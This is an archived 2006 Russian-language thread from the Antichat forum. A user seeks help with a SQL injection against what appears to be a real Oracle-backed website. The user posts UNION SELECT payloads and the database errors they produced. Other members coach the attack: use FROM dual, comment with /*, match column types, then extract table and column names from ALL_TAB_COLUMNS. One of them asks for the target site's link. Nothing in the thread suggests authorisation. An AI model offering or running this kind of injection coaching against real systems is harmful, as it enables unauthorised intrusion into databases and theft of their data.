ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
SQL injection в Oracl. Подскажите/помогите. |
02.08.2006, 13:03
|
|
Познающий
Регистрация: 20.06.2006
Сообщений: 34
Провел на форуме:
140396
Репутация:
5
|
|
SQL injection в Oracl. Подскажите/помогите.
Всем доброго дня/вечера/ночи!
Хочу выполнить SQL injection. Но ТОЛЬКО! хотеть - этого мало, нужно УМЕТЬ!, посему создана эта тема.
Сообственно ошибка.
Код:
SELECT
c.clientss_id, c.clientss_name, nc.news_clientss_inf,
TO_CHAR(nc.news_clientss_date, `DD.MM.YY`) news_date1,
nc.news_clientss_inform, nc.news_clientss_id
FROM
ANY.NEWS_CLIENTSS nc, ANY.clientss c
where
c.clientss_id=nc.clientss_id and c.clientss_id=33`
ORDER BY
nc.news_clientss_date DESC
Структура запроса.
SELECT ....... FROM ........ where ............. ORDER BY
Дописываю его.
33 union select 1,2,3,4,5,6 from nc-
таблица или представление пользователя не существует
0 union select 1,2,3,4,5,6 from clients_name--
таблица или представление пользователя не существует
Пробывал множество вариантов, и если честно - встал в тупик.
А особенно после этого.
1 union select 1,2,3,4,7,6,7 from ANY.clientss c--
в блоке запроса неверное число столбцов результата
Если добавить/убрать столбцы - результат ош. не меняется. Ну это понятно почему.
Далее...
1 union select 1,2,3,4,7,`6` from ANY.clientss c--
`6`: недопустимый идентификатор
пишу
1 union select 1,2,3,4,7,6 from ANY.clientss c--
в ответ `NC`.`NEWS_CLIENTSS_DATE`: недопустимый идентификатор
как так получилось?  
1 union select 1,2,3,4,7,6 from ANY.clientss where `1`=`1`--
неверен реляционный оператор
О иньк. в оракл мало что нашел.
Что можно еще попробывать?
Буду очень благодарен, за ссылки/подсказки.
С уважением.
|
|
|
02.08.2006, 15:44
|
|
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226
Репутация:
1332
|
|
1) в скл-запросе к оракл-серверу все идет не одной строкой, поэтому коментирование \"--\" не корректно.
2) сначала сделай from dual. когда сообщение об ошибке исчезнет попробуй обратиться к
ALL_TAB_COLUMNS. ну а дальше попробуй вытащить table_name и column_name  |
|
|
|
02.08.2006, 17:08
|
|
Познающий
Регистрация: 20.06.2006
Сообщений: 34
Провел на форуме:
140396
Репутация:
5
|
|
Сообщение от ZaCo
1) в скл-запросе к оракл-серверу все идет не одной строкой, поэтому коментирование `--` не корректно.
2) сначала сделай from dual. когда сообщение об ошибке исчезнет попробуй обратиться к
ALL_TAB_COLUMNS. ну а дальше попробуй вытащить table_name и column_name Спасибо за ответ.
1 union select 1,2,3,4,5,6 from dual
`NC`.`NEWS_CLIENTS_DATE`: недопустимый идентификатор
Почему? - ведь этот запрос уже был...
Или так задуманно?
Последний раз редактировалось m2infect; 02.08.2006 в 19:45..
|
|
|
|
04.08.2006, 03:11
|
|
Познавший АНТИЧАТ
Регистрация: 18.06.2005
Сообщений: 1,004
Провел на форуме:
2821162
Репутация:
1320
|
|
1) ZaCo правильно заметил - надо комментировать /*. При использовании union упорядочить (order by) можно только по номерам столбцов (например order by 1,3).
2) Там 6 колонок всего или ты описался.
3) При использовании union в Oracle типы столбцов должны совпадать.
Должно сработать (перепиши для своего случая): union select 1, '1', to_date('01012005','ddmmyyyy') from dual/*
Где первый столбец целые, второй строка, третий дата.
Дальше как и сказал ZaCo - вытаскиваешь таблицы, столбцы итд. Если прав будет хватать конечно.
P.S. Оракл пишется Oracle ))
P.P.S. Если не сложно, скинь в ПМ ссылку на сайт с оракл-инж. Не разу не видел просто
Удачи!
Последний раз редактировалось podkashey; 04.08.2006 в 03:15..
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
